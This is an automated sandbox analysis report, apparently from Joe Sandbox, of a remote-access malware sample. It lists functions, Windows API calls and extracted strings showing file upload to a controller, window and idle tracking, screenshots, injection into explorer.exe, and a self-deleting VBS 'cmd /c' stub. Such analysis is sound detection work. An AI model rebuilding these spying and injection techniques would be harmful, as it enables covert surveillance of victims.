                              • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                              • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                              Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                              • __aulldiv.LIBCMT ref: 00407FE9
                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                              • API String ID: 1884690901-3066803209
                              • Opcode ID: 935731731395f4204ceec93af99d173b12a0ee120979e523140cd68d8dd48b07
                              • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                              • Opcode Fuzzy Hash: 935731731395f4204ceec93af99d173b12a0ee120979e523140cd68d8dd48b07
                              • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                              Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                              • API String ID: 3795512280-3163867910
                              • Opcode ID: a5e8bd849d2efb949b0d5fa848b2f94c7da7ca507b050a9d2381404b3d3051d3
                              • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                              • Opcode Fuzzy Hash: a5e8bd849d2efb949b0d5fa848b2f94c7da7ca507b050a9d2381404b3d3051d3
                              • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                              Function 00413E37 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                              • String ID: \ws2_32$\wship6$getaddrinfo
                              • API String ID: 2490988753-3078833738
                              • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                              • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                              • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                              • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                              Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • ___free_lconv_mon.LIBCMT ref: 004500B1
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                              • _free.LIBCMT ref: 004500A6
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 004500C8
                              • _free.LIBCMT ref: 004500DD
                              • _free.LIBCMT ref: 004500E8
                              • _free.LIBCMT ref: 0045010A
                              • _free.LIBCMT ref: 0045011D
                              • _free.LIBCMT ref: 0045012B
                              • _free.LIBCMT ref: 00450136
                              • _free.LIBCMT ref: 0045016E
                              • _free.LIBCMT ref: 00450175
                              • _free.LIBCMT ref: 00450192
                              • _free.LIBCMT ref: 004501AA
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                              • String ID:
                              • API String ID: 161543041-0
                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                              • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                              • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                              Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 0041912D
                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                              • Sleep.KERNEL32(000003E8), ref: 0041926D
                              • GetLocalTime.KERNEL32(?), ref: 0041927C
                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                              • API String ID: 489098229-65789007
                              • Opcode ID: 9d68a57725902cee1e2f4c0bf3d0b8e26a84b1680611e2d1f684673f52445b2e
                              • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                              • Opcode Fuzzy Hash: 9d68a57725902cee1e2f4c0bf3d0b8e26a84b1680611e2d1f684673f52445b2e
                              • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                              Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                              • ExitProcess.KERNEL32 ref: 0040C832
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                              • API String ID: 1913171305-390638927
                              • Opcode ID: bece3d90f9d9eafcbf4cc39b2f0266e1d84ca687775a7de423d297ed33e0470e
                              • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                              • Opcode Fuzzy Hash: bece3d90f9d9eafcbf4cc39b2f0266e1d84ca687775a7de423d297ed33e0470e
                              • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                              Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                              • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                              • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                              • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                              Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                              • GetLastError.KERNEL32 ref: 00454A96
                              • __dosmaperr.LIBCMT ref: 00454A9D
                              • GetFileType.KERNEL32(00000000), ref: 00454AA9
                              • GetLastError.KERNEL32 ref: 00454AB3
                              • __dosmaperr.LIBCMT ref: 00454ABC
                              • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                              • CloseHandle.KERNEL32(?), ref: 00454C26
                              • GetLastError.KERNEL32 ref: 00454C58
                              • __dosmaperr.LIBCMT ref: 00454C5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: H
                              • API String ID: 4237864984-2852464175
                              • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                              • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                              • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                              • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                              Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                              Download Yara Rule
                              APIs
                              • __Init_thread_footer.LIBCMT ref: 0040A456
                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                              • GetForegroundWindow.USER32 ref: 0040A467
                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                              • String ID: [${ User has been idle for $ minutes }$]
                              • API String ID: 911427763-3954389425
                              • Opcode ID: 28200f3005b4fd24b85b386b341ea4380163e584f5bda866baf5ce3779d03c92
                              • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                              • Opcode Fuzzy Hash: 28200f3005b4fd24b85b386b341ea4380163e584f5bda866baf5ce3779d03c92
                              • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                              Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 65535$udp
                              • API String ID: 0-1267037602
                              • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                              • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                              • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                              • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                              Function 00416E27 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 107filesynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                              • String ID: <$@$@FG$@FG$TUF$Temp
                              • API String ID: 1107811701-4124992407
                              • Opcode ID: 752ca13c782d44821a1ec6be30a7add5be14379de4efd94ca99b1656ba8a68f0
                              • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                              • Opcode Fuzzy Hash: 752ca13c782d44821a1ec6be30a7add5be14379de4efd94ca99b1656ba8a68f0
                              • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                              Function 00406616 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                              • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe), ref: 00406705
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CurrentProcess
                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$pUF$windir$BG3i@
                              • API String ID: 2050909247-1144799832
                              • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                              • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                              • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                              • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                              Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                              • __dosmaperr.LIBCMT ref: 004393CD
                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                              • __dosmaperr.LIBCMT ref: 0043940A
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                              • __dosmaperr.LIBCMT ref: 0043945E
                              • _free.LIBCMT ref: 0043946A
                              • _free.LIBCMT ref: 00439471
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                              • String ID:
                              • API String ID: 2441525078-0
                              • Opcode ID: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
